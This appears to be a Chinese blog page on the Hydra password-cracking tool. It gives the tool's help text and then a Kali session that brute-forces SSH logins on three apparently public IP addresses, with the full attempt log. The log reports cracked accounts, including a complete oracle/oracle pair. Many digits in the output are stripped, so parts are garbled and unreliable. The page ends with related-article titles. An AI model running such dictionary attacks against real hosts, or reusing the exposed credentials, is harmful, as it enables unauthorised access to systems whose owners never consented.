Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SOuvVd46] [service://server[:PORT][/OPT]]

Options:
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to attack, one entry per line, ':' to specify port
-t TASKS run TASKS number of connects in parallel (per host, default: 16)
-U service module usage details
-h more command line options (COMPLETE HELP)
server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
service the service to crack (see below for supported protocols)
OPT some service modules support additional input (-U for module help)

Supported services: asterisk cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp redis rexec rlogin rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs. Licensed under AGPL
v3.0. The newest version is always available at http://www.thc.org/thc-hydra
Don't use in military or secret service organizations, or for illegal purposes.

Example: hydra -l user -P passlist.txt ftp://192.168.0.1

# 待破解的主机列表
root@kali:~# cat serverlist 
189.37.178.1

189.37.178.216

189.37.178.98
# 破解主机的ssh用户名密码
root@kali:~# hydra -L ssh_user.dic -P ssh_pass.dic -t  -vV -o ./output.txt -e ns -M serverlist ssh
Hydra v8. (c)  by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-08-06 23:33:06

[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have  seconds to abort...

[DATA] max  tasks per  servers, overall  tasks,  login tries (l:/p:), ~ tries per task

[DATA] attacking service ssh on port

[VERBOSE] Resolving addresses ... done

[INFO] Testing if password authentication is supported by ssh://189.37.178.47:22

[INFO] Successful, password authentication is supported by ssh://189.37.178.47:22

[INFO] Testing if password authentication is supported by ssh://189.37.178.216:22

[INFO] Successful, password authentication is supported by ssh://189.37.178.216:22

[INFO] Testing if password authentication is supported by ssh://189.37.178.98:22

[INFO] Successful, password authentication is supported by ssh://189.37.178.98:22

[ATTEMPT] target 189.37.178.1 - login "root" - pass "root" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "root" - pass "root" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "root" - pass "root" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "root" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "root" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "root" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "root" - pass "oracle123" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "root" - pass "oracle123" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "root" - pass "oracle123" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "root" - pass "" -  of  [child ]

[][ssh] host:189.37.178.98   login: root

[ATTEMPT] target 189.37.178.98 - login "admin" - pass "admin" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "admin" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "admin" - pass "oracle123" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "root" - pass "oracle" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "admin" - pass "admin" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "admin" - pass "oracle" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "root" - pass "oracle" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "root" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "admin" - pass "admin" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "pentest" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "admin" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "admin" - pass "oracle123" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "oracle123" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "oracle" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "admin" - pass "oracle" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "admin" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "admin" - pass "oracle123" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "oracle" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "pentest" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "pentest" - pass "oracle123" -  of  [child ]

[][ssh] host:189.37.178.1   login: pentest   password:

[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "oracle" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "oracle123" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.98 - login "oracle" - pass "" -  of  [child ]

[STATUS] attack finished for189.37.178. (waiting for children to complete tests)

[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "oracle123" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "admin" - pass "oracle" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "admin" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "pentest" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.1 - login "oracle" - pass "" -  of  [child ]

[STATUS] attack finished for189.37.178. (waiting for children to complete tests)

[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "toor" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "oracle123" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "oracle" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "pentest" - pass "" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "oracle" - pass "oracle" -  of  [child ]

[ATTEMPT] target 189.37.178.216 - login "oracle" - pass "" -  of  [child ]

[][ssh] host:189.37.178.216   login: oracle   password: oracle

[STATUS] attack finished for189.37.178. (waiting for children to complete tests)

 of  targets successfully completed,  valid passwords found

Hydra (http://www.thc.org/thc-hydra) finished at 2017-08-06 23:33:41
# 查看output.txt即可查看已破解成功的列表

root@kali:~# cat output.txt

# Hydra v8. run at -- :: on serverlist ssh (hydra -L ssh_user.dic -P ssh_pass.dic -t  -vV -o ./output.txt -e ns -M serverlist ssh)

[][ssh] host: 189.37.178.98   login: root

[][ssh] host: 189.37.178.1   login: pentest   password:

[][ssh] host: 189.37.178.216   login: oracle   password: oracle

安全工具-Hydra的更多相关文章

  1. 路由器密码破解工具 Hydra 7.5

    之前只在 Browser 中保存了路由管理密码,无奈升级时管理的密码丢失了,又不想重新设置,所以尝试破解登录密码. 使用破解工具 Hydra 7.5. # hydra -l username -x : ...

  2. Linux下的暴力密码在线破解工具Hydra安装及其组件安装-使用

    Linux下的暴力密码在线破解工具Hydra安装及其组件安装-使用 hydra可以破解: http://www.thc.org/thc-hydra,可支持AFP, Cisco AAA, Cisco a ...

  3. 暴力破解工具hydra与Medusa

    ---恢复内容开始--- 暴力破解工具hydra与Medusa 内容 (一)hadry (二)Medusa (一)hydra 选项 -l LOGIN 指定破解的用户名称,对特定用户破解. -L FIL ...

  4. (总结)Linux下的暴力密码在线破解工具Hydra详解

    (总结)Linux下的暴力密码在线破解工具Hydra详解 学习了:https://blog.csdn.net/yafeichang/article/details/53502869

  5. 初试在线破解工具Hydra爆破3389服务器

    hydra是一款全能的暴力破解工具,功能强大,几乎支持所有的协议,是著名黑客组织thc开发的. 在Kali Linux下已经是默认安装的,于是测试爆破一下自己的一台VM虚拟机服务器.hydra还支持G ...

  6. Linux下暴力破解工具Hydra详解

    一.简介 Number one of the biggest security holes are passwords, as every password security study shows. ...

  7. [转]Linux下的暴力密码破解工具Hydra详解

    摘自:http://linzhibin824.blog.163.com/blog/static/735577102013144223127/ 这款暴力密码破解工具相当强大,支持几乎所有协议的在线密码破 ...

  8. linux下暴力破解工具hydra【转】

    一.简介 Number one of the biggest security holes are passwords, as every password security study shows. ...

  9. linux暴力密码破解工具hydra安装与使用

    说明:hydra是著名黑客组织thc的一款开源的暴力密码破解工具,可以在线破解多种密码.官网:http://www.thc.org/thc-hydra,可支持AFP, Cisco AAA, Cisco ...

  10. Kali中密码暴力破解工具hydra的使用

    前言 hydra是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解.密码能否破解,在于字典是否强大.本文仅从安全角度去讲解工具的使用,请 ...

随机推荐

  1. WPFToolkit DataGrid 使用介绍zz

      首先:这版本需要.NetFrameWork SP1的支持 WPF Toolkit - February 2010 Release 下载地址:http://wpf.codeplex.com/rele ...

  2. BZOJ.1805.[IOI2007]sail船帆(贪心 线段树)

    BZOJ 洛谷 首先旗杆的顺序没有影响,答案之和在某一高度帆的总数有关.所以先把旗杆按高度排序. 设高度为\(i\)的帆有\(s_i\)个,那么答案是\(\sum\frac{s_i(s_i-1)}{2 ...

  3. 安装完最小化 RHEL/CentOS 7 后需要做的 30 件事情7. 安装 PHP PHP 是用于 web 基础服务的服务器端脚本语言。它也经常被用作通用编程语言。在最小化安装的 CentOS 中安

    CentOS 是一个工业标准的 Linux 发行版,是红帽企业版 Linux 的衍生版本.你安装完后马上就可以使用,但是为了更好地使用你的系统,你需要进行一些升级.安装新的软件包.配置特定服务和应用程 ...

  4. shell脚本8--录制终端会话

    准备: script -t 2> timing.log -a output.session type commands; ... . .. exit 回放: scriptreplay timin ...

  5. 2017.08.06【NOIP提高组】模拟赛B组

    Summary 今天的比赛60+100+100=260分,没有想到第一题正解是搜索,我与AK差一段距离,这段距离,叫倒着搜.总的来说不是很难. Problem T1 天平 题目大意 给你N个排序好的砝 ...

  6. idea快捷键列表

    Ctrl+Shift + Enter,语句完成 “!”,否定完成,输入表达式时按 “!”键 Ctrl+E,最近的文件 Ctrl+Shift+E,最近更改的文件 Shift+Click,可以关闭文件 C ...

  7. python之socket编程3

    1 什么是粘包 只有TCP有粘包现象,UDP永远不会粘包 应用程序所看到的数据是一个整体,或说是一个流(stream),一条消息有多少字节对应用程序是不可见的,因此TCP协议是面向连接的,面向流的,收 ...

  8. Vue(九)小案例 - 百度搜索列表(跨域)

    <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8&quo ...

  9. HTML5 学习04—— MathML数学标记

    MathML 元素标签: <math>...</math> MathML 是数学标记语言,是一种基于XML(标准通用标记语言的子集)的标准,用来在互联网上书写数学符号和公式的置 ...

  10. 编写CentOS的System V init启动脚本

    系统本身自带了说明,在/usr/share/doc/initscripts-(*)/sysvinitfiles,内容如下: 所有System V init脚本都命名为/etc/rc.d/init.d/ ...